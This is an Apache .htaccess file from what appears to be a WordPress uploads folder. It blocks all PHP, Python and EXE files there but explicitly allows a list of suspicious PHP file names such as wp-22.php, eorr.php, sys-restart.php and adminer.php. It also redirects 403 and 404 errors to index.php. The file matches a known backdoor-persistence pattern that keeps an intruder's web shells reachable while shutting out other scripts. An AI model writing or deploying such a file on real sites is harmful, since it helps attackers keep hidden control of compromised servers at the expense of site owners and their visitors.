File: /var/www/html/wp-content/uploads/2024/07/.htaccess
<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(options-discussion.php|adminer.php|json.php|modules.php|wincust.php|403.php|404.php|eorr.php|index.php|link.php|wp-login.php|sys-restart.php|connects.php|html.php|hyper.php|1index.php|unix.php|wp-22.php|autoload_classmap.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
# Custom error handling
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php